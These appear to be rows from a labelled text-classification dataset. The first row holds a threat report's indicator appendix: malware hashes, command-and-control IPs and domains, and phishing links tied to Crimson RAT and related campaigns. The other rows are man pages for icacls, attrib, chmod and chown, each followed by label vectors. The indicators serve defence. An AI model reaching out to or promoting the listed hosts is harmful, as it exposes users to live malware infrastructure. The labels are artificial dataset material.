2cff1578ac42cc0cd5f59e28d6e7240f 31a9e46ff607b842b8fff4a0644cc0f4 3540f2771b2661ecbd03933c227fb7f7 3b979fd0a8fa0ecbc334a3bbbfb68a36 4a717b657ea475197d967008c7db8353 511bcd411ec79c6ca555670e98709e46 5998641f454f82b738977aa8b3d1d283 725379749d3fa793edcce12291782134 77c7c0117a0e457d7e3ceef4ab82c2ca 7920862303764a55050d2da38b8bf4db 858a729819cc082f2762b6d488284c19 86e27e86e64031720a1ca52d2fbb7c98 af5e96e260b71356d62900551f68f338 b04117ee18182c1c07ffaf6fb35b08bc c33c79c437d94fad3476f78361df0f24 c9e4c816b4ef23c28992e0e894b9c822 ee5a460ded205d2074a23e387c377840 f13a1a0cbcd5e13dd00dbc77c35973ef f6d141f45e76cefcb712f69c193b3ac1 f8955450fbd62cb4461c725d8985ff60 fa97cba6a52896e1f2146957a6eec04f fab5eff5fc65a7a2c5920586df5e29c2 Peppy RAT Domains applemedia1218.com avssync3357.com bbmdroid.com bbmsync2727.com bluesync2121.com eastmedia1221.com eastmedia3347.co.cc eastmedia3347.com facemedia.co.cc kssync3343.com kssync3347.co.cc kssync3347.com mahee.kssync3343.co.cc mvssync8767.com 32 student3347.mooo.com winupdater2112.com Andromeda Samples 0123411a6cfe8afb4a45e4afeed767e7 114551a87fa332a243fc05b7246309b9 128c0ccc1252098bc2314d88f4e70044 133e0c441ea744951080d700604a63ee 1f97ddaea7ac0c4e20b2db75969b4545 4b0481a591c87e8542e2089396a10d3c 7ec3ec88185f9c235e2d3da7434b928a 878aa68245675ca5ea677aaf28707b7a 990c3b67061109d82627a5642bf1bb68 a4ce604f8d3ac2e5facdae3c63ef4dc6 a6d75b57bd597e723335f96f074f5700 a6ef041311497bcddb8818b5a4f6c90e ae2ef98a91c70dc43979ce7df8e475ad aec91b4453a1b321e302127bc9f21a7c f0e64d2b011223ece668c595406f1abc f4123e7f09961479452f0f42b3706293 fb2cb45bf53cef41674da2d9a4bdba32 Andromeda Domains dvdonlinestore.net eastmedia2112.com mustache-styles.com onlinestoreonsale.com pradahandbagsshoes.com vhideip.com wisheshub.com 99mesotheliomalawyers.com Various Downloader Samples 2ba1e2a63129517055ab3a63cb089e33 4131776ae573bdb25009a343cf1541f5 44fe2f4dd8b001bbcc4de737128095ca 63ee06dae035981c5aea04f5a52879c1 643e30e665124eea94a22641f79a9c91 67bad4ad3d9a06fc20bea8c3ebb7ad01 7e97efc85be451432388b9f1ce623400 861f621fdf2d3e760df50009fe2824ae a957e3a7aed4efd1b214d3c3b79f5874 c16b43a5897861fbe023e4b7d340f2e8 dbd5c44e6c189f289e0eea1454897b26 e26150f5186bb7230d85f4cf3aa45d17 Python Downloader Sample 82719f0f6237d3efb9dd67d95f842013 Meterpreter Samples 04e8404f1173037ba4e11241b141d91d c411ee81c34e14a1ace7e72bea2e8d12 d30c6df94922323041f8036365abbfd2 33 Meterpreter C&C 5.199.170[.]149 njRAT Sample 27ca136850214234bcdca765dfaed79f njRAT C&C 5.189.145[.]248 Malicious Documents 0197ff119e1724a1ffbf33df14411001 18711f1db99f6a6f73f8ab64f563accc 1f82e509371c1c29b40b865ba77d091a 278fd26be39a06d5e19c5e7fd7d3dcc2 3966f669a6af4278869b9cce0f2d9279 438031b9d79a17b776b7397e989dd073 68773f362d5ab4897d4ca217a9f53975 76f410c27d97e6c0403df274bebd5f6e 98bdcd97cd536ff6bcb2d39d9a097319 Unknown, likely related 0437655995f4d3104989fb963aa41339 c0ff05a6bf05465adfc9a1dfd5305bde Unknown C&C 5.189.137[.]8 Luminosity Link Sample 708a1af68d532df35c34f7088b8e798f Luminosity Link C&C 5.189.145[.]248 Bezigate Samples 236e7451cbce959ca0f62fb3b499b54e 44db769fb1f29a32d5c1998e29b4b7c4 85d182f7a0e049169a7bd0aa796fba96 96dbed32a59b50e6100f1ca35ef5a698 e49edc719eaab11a40158c15c9dd9b7b Bezigate C&C 107.167.93[.]197 62.4.23[.]46 ad2.admart[.]tv winupdatess.no-ip[.]biz DarkComet Samples 0aecd3b79d72cbfa8f5dce2a12e76053 278f889f494d62e214406c4fcfa6f9a3 fd5a419924a0816c6357b47f4e375732 34 DarkComet C&C ad2.admart[.]tv 107.167.93[.]197 Intribune.blogspot[.]com Links hxxp://intribune.blogspot[.]com/2015/11/4-sikh-army-officers-being-trialed-in.html hxxp://intribune.blogspot[.]com/2015/11/seventh-pay-commission-recommends.html hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator.xls hxxp://intribune.blogspot[.]com/2015/11/army-air-defenceengineers-and-signal-to.html hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html attachment.biz links hxxp://ceengrmes[.]attachment[.]biz/?att=1450603943 hxxp://comdtoscc[.]attachment[.]biz/?att=1451926252 hxxp://comdtoscc[.]attachment[.]biz/?att=1453788170 hxxp://fileshare[.]attachment[.]biz/?att=1455255900 hxxp://fileshare[.]attachment[.]biz/?att=1455264091 Cluster 2 IOCs Crimson SecApp Samples ccfd8c384558c5a1e09350941faa08ab 167d632eea9bd1b6cac00a69b431a5c0 e3e4ced9b000aa47a449f186c7604ac8 79f7e1d6389c73a7e2525d0ec8fa3ce2 0a7a15180053270e25a220a3e38e7949 17495ce3d11e9cddf5a98ec34ee91d6a 148403235614461c1f088d524fbd9fd0 b67047e341653a01526cc178966d1f6c ef0ab9f731e7c980b163c7e1b5db9746 3739bbf831d04e8a2b06275cd3af371d 0d7846a76675be378a50667767d0e35a 4f9b754da90bed9a633130d893d65c4e 3e91836b89b6d6249741dc8ee0d2895a 85429d5f2745d813e53b28d3d953d1cd Crimson RAT Samples 870c0312cea7b3b6b82be01633b071cd a74165ec1d55b682ed232ffde62b3b11 8336d9aeccee3408a4f9fbf4b1a42bac 2dfe4468a052a07cab117a20e182adc9 Crimson C&C 178.238.228[.]113 Beendoor Downloader 950eb314435bdb3c46c9f0954c935287 Beendoor Sample d3094c89cad5f8d1ea5f0a7f23f0a2b1 Beendoor C&C 178.238.235[.]143 35 Cluster 3 IOCs Crimson RAT Samples 51c57b0366d0b71acf05b4df0afef52f 438f3ea41587e9891484dad233d6faa6 71cd70b289c53567579f8f6033d8191b d8637bdbcfc9112fcb1f0167b398e771 12929730cd95c6cf50dd3d470dd5f347 7ccc752b5956b86b966d15a6a4cf6df0 b2ed9415d7cf9bc06f8ccb8cfdba1ad6 cedb0fc3dfbb748fdcbb3eae9eb0a3f1 95cba4805f980e8c1df180b660e2abb4 Crimson C&C 88.150.227.71 Cluster 4 IOCs Crimson Downloader Sample 5d9b42853ecf3ff28d4e4313276b21ed Crimson RAT Samples 90b07bc12b45f2eb1b0305949f2cec25 3e7c2791ff7bc14ef30bba74954ef1e2 44145124e046804bf579c8839b63a9a7 a73494ca564f6404488a985cefd96f56 8a0db32b97be106d2834739ffd65715b ddb66b231ab63c65a8ce139e73652aec Crimson C&C bhai123.no-ip[.]biz bhai1.ddns[.]net sudhir71nda.no-ip[.]org 119.154.134[.]211 119.154.209[.]175 119.154.220[.]96 119.157.163[.]145 119.157.229[.]245 182.181.239[.]4 Unclustered Crimson Samples Crimson Downloader Samples 6a1c037c66184aa39096933f75d2d8ca 99d93e0c6bf9cf9acb92580686f6b743 af071cd2420057090cfe33fefa139d01 8c30ed1bc13feaa8e937be0f6a739be4 adf657337d7fa7fa07c72b12fb880e41 e2d1309893c0de5a026a2ae9e8ada486 99d93e0c6bf9cf9acb92580686f6b743 d0152f228e934dcafa866445c08e3242 af071cd2420057090cfe33fefa139d01 9b674985a412c4c07d52c7482c2ed286 c3af6b938988a88ea2dc2e59f8418062 2d58826fbff197918caa805aeed86059 ab6b6f675e48d818044c5e66d05813ce 4b1a627c43d4e0af504bf20023e74f6b 75798547f0ddca076070bcea67a0b064 0255f73a32bf781c786d19d149ddfb90 36 16eb146eee147a333ef82d39266d5cfb 2507f545a2d6e52ade2d7708d9ce89d1 f9798f171194ee4fec5334ded3d786e7 9b77eb38e32d43a97c5bde5ec829c5ca 2eea994efa88e0a612e82ee3e08e78f1 Crimson SecApp Samples c303a6ac44e3c59a9c3613ac9f92373b 92d6366d692a1b3691dce1379bb7b5aa eb01bbfe8ca7e8f59aab475ad1f18245 4d7ad9ab4c1d40365da60d4f2f195db4 f936afdd0b69d109215d295ab864d309 ec4bef2233002d8fe568428d16e610b1 045c4b69d907833729fd83d937669f66 522178a60b030bbab910cb86cfeaff20 1ab5f55763663ffb0807079397812b47 73b878e56f790dccf08bd2344b4031c8 f0f6544ddb26c55df2d6184f433d8c17 7c23f984170fd793cfde5fd68535d0a8 73b878e56f790dccf08bd2344b4031c8 7e50c67f1e94b154f110d5d73e2f312c 1bedd50f4ae757c6009acbe7da021122 ae9659a2c08e2cb9ab9e5cdcb8ab4036 0991033c2414b4992c1b5ab21c5a47e2 f710e3ad19a682dab374c167c7c2796a Crimson RAT Samples 214eb28f04d969c9f637b09e4ffad644 29097319b60c103421437214d5a3297e 38ce32cb94092cc6790030abcc9a638b 439ba84a964a17ce2c3d51ac49c68f81 4e9b81e70227575f2d2a6dd941540afa 5b4361e6a6117e9f7189a564f46157d7 5dbeb8475e22a938415eb43e6bd24fe8 6409930f39cd6c17fb68f7fee47b1cdf 82377fcf288e9db675ab24cbf76ea032 84c30675b5db34c407b98ea73c5e7e96 897fc3a65f84e1c3db932965a574d982 9e73d275202b02b3f0ed23951fda30da b0327f155ebaba23102f72c1100fa26b b05730eda99a9160cc3f8dec66e9f347 b467df662af8a1fbafa845c894d917e3 c0bf5a0f535380edec9b42a3cebb84c4 ca48224adce9609dc07e50930dd1afae dac44b9d5a8494a3293088c9678754bc e0217714f3a03fae4cdf4b5120213c38 e66203177a03743a6361a7b3e668b6a6 f05834a930f6fda6b877011c3fb3ef18 f1a2caf0dd7922ea3a64231fd5af7715 Crimson C&C 5.189.131[.]67 5.189.152[.]147 5.189.167[.]220 5.189.167[.]23 79.143.181[.]21 79.143.188[.]166 892 Ross Drive Sunnyvale, CA 94089 about proofpoint Proofpoint Inc. (NASDAQ:PFPT) is a leading security-as-a-service provider that focuses on cloud-based solutions for threat protection, compliance, archiving & governance, and secure communications. Organizations around the world depend on Proofpoint\xe2\x80\x99s expertise, patented technologies and on-demand delivery system to protect against phishing, malware and spam, safeguard privacy, encrypt sensitive information, and archive and govern messages and critical enterprise information. 1.408.517.4710 www.proofpoint.com 37 \xc2\xa9Proofpoint, Inc. Proofpoint is a trademark of Proofpoint, Inc. in the United States and other countries. All other trademarks contained herein are property of their respective owners. Threat Insight | Operation Transparent Tribe 193.164.131[.]58 213.136.69[.]224 213.136.73[.]122 213.136.84[.]43 MSIL/Crimson Modules Keylogger f18172d7bb8b98246cb3dbb0e9144731 b55a7da332bed90e798313b968ce7819 c0eb694960d0a7316264ced4d44b3abb 292f468f98e322795d1185c2b15c1f62 b6263f987fdec3fb3877845c8d5479dd 127ee83854f47628984ab47de725ee2f 2fa82dd2490fc697bb0bb0f8feb0dd85 bc6d139a3d630ba829337687b9328caf f3c8630d06e51e8f76aa1fb438371d21 3a64e2d3558a28c4fdb0f076fa09e1a1 370bb0ec1c16bd8821f7e53f6bfc61e3 Infostealer d938a75d93c20790b1f2b5d5b7294895 29eb61f04b905e2133e9afdd12482073 9bdfc0d5c45f1ce1200419ec6eec15f4 8a991eec65bd90f12450ee9dac0f286a USBstealer c3d65d73cd6894fdad3fc281b976fd8b e9b1a3aa2de67300356b6587a8034b0b cf5e472613921dc330008c79870b23ab bf2eb6c19778a35f812ddc86d616c837 1e5c2029dafdd50dce2effd5154b6879 b785db2b3801d5190dad9e6f03d48999 3f84ddc0d9ec7b08477a76b75b4421b8 c0ceba3a708082c372c077aa9420d09e d11ebec8f1d42dd139b18639f7f9534a -> 5.189.167[.]220 URLDownloader Module Sample 532013750ee3caac93a9972103761233 URLDownloader C&C hxxp://sahirlodhi[.]com/usr/api.txt _GoBack h.joci8kek0h3x h.hn2i1kwtic1y","1","0","0","0","0","1","0","0","1","1","1","0","0","0","0","1","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","1","0","1","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0"
-"icacls | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents icacls 08/21/2018 3 minutes to read In this article Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories. For examples of how to use this command, see Examples. Syntax icacls [/grant[:r] :[...]] [/deny :[...]] [/remove[:g|:d]] [...]] [/t] [/c] [/l] [/q] [/setintegritylevel :[...]] icacls [/substitute [...]] [/restore [/c] [/l] [/q]] Parameters Parameter Description Specifies the file for which to display DACLs. Specifies the directory for which to display DACLs. /t Performs the operation on all specified files in the current directory and its subdirectories. /c Continues the operation despite any file errors. Error messages will still be displayed. /l Performs the operation on a symbolic link versus its destination. /q Suppresses success messages. [/save [/t] [/c] [/l] [/q]] Stores DACLs for all matching files into ACLfile for later use with /restore. [/setowner [/t] [/c] [/l] [/q]] Changes the owner of all matching files to the specified user. [/findSID [/t] [/c] [/l] [/q]] Finds all matching files that contain a DACL explicitly mentioning the specified security identifier (SID). [/verify [/t] [/c] [/l] [/q]] Finds all files with ACLs that are not canonical or have lengths inconsistent with ACE (access control entry) counts. [/reset [/t] [/c] [/l] [/q]] Replaces ACLs with default inherited ACLs for all matching files. [/grant[:r] :[...]] Grants specified user access rights. Permissions replace previously granted explicit permissions. Without :r, permissions are added to any previously granted explicit permissions. [/deny :[...]] Explicitly denies specified user access rights. An explicit deny ACE is added for the stated permissions and the same permissions in any explicit grant are removed. [/remove[:g|:d]] [...]] [/t] [/c] [/l] [/q] Removes all occurrences of the specified SID from the DACL. :g removes all occurrences of granted rights to the specified SID.:d removes all occurrences of denied rights to the specified SID. [/setintegritylevel [(CI)(OI)]:[...]] Explicitly adds an integrity ACE to all matching files. Level is specified as: - L[ow]- M[edium] - H[igh]Inheritance options for the integrity ACE may precede the level and are applied only to directories. [/substitute [...]] Replaces an existing SID (SidOld) with a new SID (SidNew). Requires the Directory parameter. /restore [/c] [/l] [/q] Applies stored DACLs from ACLfile to files in the specified directory. Requires the Directory parameter. /inheritancelevel:[e|d|r] Sets the inheritance level: e - Enables enheritance d - Disables inheritance and copies the ACEs r - Removes all inherited ACEs Remarks SIDs may be in either numerical or friendly name form. If you use a numerical form, affix the wildcard character * to the beginning of the SID. icacls preserves the canonical order of ACE entries as: Explicit denials Explicit grants Inherited denials Inherited grants Perm is a permission mask that can be specified in one of the following forms: A sequence of simple rights: F (full access) M (modify access) RX (read and execute access) R (read-only access) W (write-only access) A comma-separated list in parenthesis of specific rights: D (delete) RC (read control) WDAC (write DAC) WO (write owner) S (synchronize) AS (access system security) MA (maximum allowed) GR (generic read) GW (generic write) GE (generic execute) GA (generic all) RD (read data/list directory) WD (write data/add file) AD (append data/add subdirectory) REA (read extended attributes) WEA (write extended attributes) X (execute/traverse) DC (delete child) RA (read attributes) WA (write attributes) Inheritance rights may precede either Perm form, and they are applied only to directories: (OI): object inherit (CI): container inherit (IO): inherit only (NP): do not propagate inherit Examples To save the DACLs for all files in the C:\\Windows directory and its subdirectories to the ACLFile file, type: icacls c:\\windows\\* /save aclfile /t To restore the DACLs for every file within ACLFile that exists in the C:\\Windows directory and its subdirectories, type: icacls c:\\windows\\ /restore aclfile To grant the user User1 Delete and Write DAC permissions to a file named ""Test1"", type: icacls test1 /grant User1:(d,wdac) To grant the user defined by SID S-1-1-0 Delete and Write DAC permissions to a file, named ""Test2"", type: icacls test2 /grant *S-1-1-0:(d,wdac) Additional references Command-Line Syntax Key Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Feedback Send feedback about This product This page You may also leave feedback directly on GitHub . This page You may also leave feedback directly on GitHub . Liquid error: Can't find the localized string giveDocumentationFeedback for template Conceptual. Issue Title Leave a comment Submit feedback Loading feedback... There are no open issues There are no closed issues View on GitHub Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"attrib | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents attrib 10/16/2017 2 minutes to read In this article Displays, sets, or removes attributes assigned to files or directories. If used without parameters, attrib displays attributes of all files in the current directory. For examples of how to use this command, see Examples. Syntax attrib [{+|-}r] [{+|-}a] [{+|-}s] [{+|-}h] [{+|-}i] [:][][] [/s [/d] [/l]] Parameters Parameter Description {+|-}r Sets (+) or clears (-) the Read-only file attribute. {+|-}a Sets (+) or clears (-) the Archive file attribute. {+|-}s Sets (+) or clears (-) the System file attribute. {+|-}h Sets (+) or clears (-) the Hidden file attribute. {+|-}i Sets (+) or clears (-) the Not Content Indexed file attribute. [:][][] Specifies the location and name of the directory, file, or group of files for which you want to display or change attributes. You can use the ? and * wildcard characters in the FileName parameter to display or change the attributes for a group of files. /s Applies attrib and any command-line options to matching files in the current directory and all of its subdirectories. /d Applies attrib and any command-line options to directories. /l Applies attrib and any command-line options to the Symbolic Link, rather than the target of the Symbolic Link. /? Displays help at the command prompt. Remarks You can use wildcard characters (? and *) with the FileName parameter to display or change the attributes for a group of files. If a file has the System (s) or Hidden (h) attribute set, you must clear the attribute before you can change any other attributes for that file. The Archive attribute (a) marks files that have changed since the last time they were backed up. Note that the xcopy command uses archive attributes. Examples To display the attributes of a file named News86 that is located in the current directory, type: attrib news86 To assign the Read-only attribute to the file named Report.txt, type: attrib +r report.txt To remove the Read-only attribute from files in the Public directory and its subdirectories on a disk in drive B, type: attrib -r b:\\public\\*.* /s To set the Archive attribute for all files on drive A, and then clear the Archive attribute for files with the .bak extension, type: attrib +a a:*.* & attrib -a a:*.bak Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Feedback Send feedback about This product This page You may also leave feedback directly on GitHub . This page You may also leave feedback directly on GitHub . Liquid error: Can't find the localized string giveDocumentationFeedback for template Conceptual. Issue Title Leave a comment Submit feedback Loading feedback... There are no open issues There are no closed issues View on GitHub Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"die.net chmod(1) - Linux man page Name chmod - change file mode bits Synopsis chmod [OPTION]... MODE[,MODE]... FILE... chmod [OPTION]... OCTAL-MODE FILE... chmod [OPTION]... --reference=RFILE FILE... Description This manual page documents the GNU version of chmod. chmod changes the file mode bits of each given file according to mode, which can be either a symbolic representation of changes to make, or an octal number representing the bit pattern for the new mode bits. The format of a symbolic mode is [ugoa...][[+-=][perms...]...], where perms is either zero or more letters from the set rwxXst, or a single letter from the set ugo. Multiple symbolic modes can be given, separated by commas. A combination of the letters ugoa controls which users' access to the file will be changed: the user who owns it (u), other users in the file's group (g), other users not in the file's group (o), or all users (a). If none of these are given, the effect is as if a were given, but bits that are set in the umask are not affected. The operator + causes the selected file mode bits to be added to the existing file mode bits of each file; - causes them to be removed; and = causes them to be added and causes unmentioned bits to be removed except that a directory's unmentioned set user and group ID bits are not affected. The letters rwxXst select file mode bits for the affected users: read (r), write (w), execute (or search for directories) (x), execute/search only if the file is a directory or already has execute permission for some user (X), set user or group ID on execution (s), restricted deletion flag or sticky bit (t). Instead of one or more of these letters, you can specify exactly one of the letters ugo: the permissions granted to the user who owns the file (u), the permissions granted to other users who are members of the file's group (g), and the permissions granted to users that are in neither of the two preceding categories (o). A numeric mode is from one to four octal digits (0-7), derived by adding up the bits with values 4, 2, and 1. Omitted digits are assumed to be leading zeros. The first digit selects the set user ID (4) and set group ID (2) and restricted deletion or sticky (1) attributes. The second digit selects permissions for the user who owns the file: read (4), write (2), and execute (1); the third selects permissions for other users in the file's group, with the same values; and the fourth for other users not in the file's group, with the same values. chmod never changes the permissions of symbolic links; the chmod system call cannot change their permissions. This is not a problem since the permissions of symbolic links are never used. However, for each symbolic link listed on the command line, chmod changes the permissions of the pointed-to file. In contrast, chmod ignores symbolic links encountered during recursive directory traversals. Setuid and Setgid Bits chmod clears the set-group-ID bit of a regular file if the file's group ID does not match the user's effective group ID or one of the user's supplementary group IDs, unless the user has appropriate privileges. Additional restrictions may cause the set-user-ID and set-group-ID bits of MODE or RFILE to be ignored. This behavior depends on the policy and functionality of the underlying chmod system call. When in doubt, check the underlying system behavior. chmod preserves a directory's set-user-ID and set-group-ID bits unless you explicitly specify otherwise. You can set or clear the bits with symbolic modes like u+s and g-s, and you can set (but not clear) the bits with a numeric mode. Restricted Deletion Flag or Sticky Bit The restricted deletion flag or sticky bit is a single bit, whose interpretation depends on the file type. For directories, it prevents unprivileged users from removing or renaming a file in the directory unless they own the file or the directory; this is called the restricted deletion flag for the directory, and is commonly found on world-writable directories like /tmp. For regular files on some older systems, the bit saves the program's text image on the swap device so it will load more quickly when run; this is called the sticky bit. Options Change the mode of each FILE to MODE. -c, --changes like verbose but report only when a change is made --no-preserve-root do not treat '/' specially (the default) --preserve-root fail to operate recursively on '/' -f, --silent, --quiet suppress most error messages -v, --verbose output a diagnostic for every file processed --reference=RFILE use RFILE's mode instead of MODE values -R, --recursive change files and directories recursively --help display this help and exit --version output version information and exit Each MODE is of the form '[ugoa]*([-+=]([rwxXst]*|[ugo]))+'. Author Written by David MacKenzie and Jim Meyering. Reporting Bugs Report chmod bugs to bug-coreutils@gnu.org GNU coreutils home page: . This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. See Also chmod(2) The full documentation for chmod is maintained as a Texinfo manual. If the info and chmod programs are properly installed at your site, the command info coreutils aqchmod invocationaq should give you access to the complete manual. Referenced By acl(5), apmsleep(1), attr(5), chacl(1), cloginrc(5), collectd.conf(5), cpmchmod(1), faxcron(8), fcntl(2), find(1), finger(1), fsdiff(1), genisoimage(1), gfs2_mount(8), gfs_mount(8), guestfish(1), jk_init(8), kpsestat(1), ksh(1), ksh93(1), lp(4), lslk(8), mailx(1), mkfs.xfs(8), mksh(1), mount.gfs2(8), mtree(8), nfs4_acl(5), nfs4_setfacl(1), path_resolution(2), path_resolution(7), rfchmod(1), rfmkdir(1), rrdcached(1), rsync(1), rsyncd.conf(5), sane-umax_pp(5), setfacl(1), setmode(3), sh(1), shellinaboxd(1), slapd(8), snmpd.conf(5), sssd-krb5(5), star(1), strmode(3), symlink(7), tex4ht(1), texmfstart(1), zapping_setup_fb(1), zoo(1), zshbuiltins(1) Site Search Library linux docs linux man pages page load time Toys world sunlight moon phase trace explorer Back","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"die.net chown(1) - Linux man page Name chown - change file owner and group Synopsis chown [OPTION]... [OWNER][:[GROUP]] FILE... chown [OPTION]... --reference=RFILE FILE... Description This manual page documents the GNU version of chown. chown changes the user and/or group ownership of each given file. If only an owner (a user name or numeric user ID) is given, that user is made the owner of each given file, and the files' group is not changed. If the owner is followed by a colon and a group name (or numeric group ID), with no spaces between them, the group ownership of the files is changed as well. If a colon but no group name follows the user name, that user is made the owner of the files and the group of the files is changed to that user's login group. If the colon and group are given, but the owner is omitted, only the group of the files is changed; in this case, chown performs the same function as chgrp. If only a colon is given, or if the entire operand is empty, neither the owner nor the group is changed. Options Change the owner and/or group of each FILE to OWNER and/or GROUP. With --reference, change the owner and group of each FILE to those of RFILE. -c, --changes like verbose but report only when a change is made --dereference affect the referent of each symbolic link (this is the default), rather than the symbolic link itself -h, --no-dereference affect each symbolic link instead of any referenced file (useful only on systems that can change the ownership of a symlink) --from=CURRENT_OWNER:CURRENT_GROUP change the owner and/or group of each file only if its current owner and/or group match those specified here. Either may be omitted, in which case a match is not required for the omitted attribute. --no-preserve-root do not treat '/' specially (the default) --preserve-root fail to operate recursively on '/' -f, --silent, --quiet suppress most error messages --reference=RFILE use RFILE's owner and group rather than specifying OWNER:GROUP values -R, --recursive operate on files and directories recursively -v, --verbose output a diagnostic for every file processed The following options modify how a hierarchy is traversed when the -R option is also specified. If more than one is specified, only the final one takes effect. -H if a command line argument is a symbolic link to a directory, traverse it -L traverse every symbolic link to a directory encountered -P do not traverse any symbolic links (default) --help display this help and exit --version output version information and exit Owner is unchanged if missing. Group is unchanged if missing, but changed to login group if implied by a ':' following a symbolic OWNER. OWNER and GROUP may be numeric as well as symbolic. Examples chown root /u Change the owner of /u to ""root"". chown root:staff /u Likewise, but also change its group to ""staff"". chown -hR root /u Change the owner of /u and subfiles to ""root"". Author Written by David MacKenzie and Jim Meyering. Reporting Bugs Report chown bugs to bug-coreutils@gnu.org GNU coreutils home page: . This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. See Also chown(2) The full documentation for chown is maintained as a Texinfo manual. If the info and chown programs are properly installed at your site, the command info coreutils aqchown invocationaq should give you access to the complete manual. Referenced By fd(4), hd(4), initrd(4), lp(4), mem(4), mtree(8), procmail(1), ram(4), rpc.statd(8), sm-notify(8), symlink(7), tty(4), ttys(4), zero(4) Site Search Library linux docs linux man pages page load time Toys world sunlight moon phase trace explorer Back","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
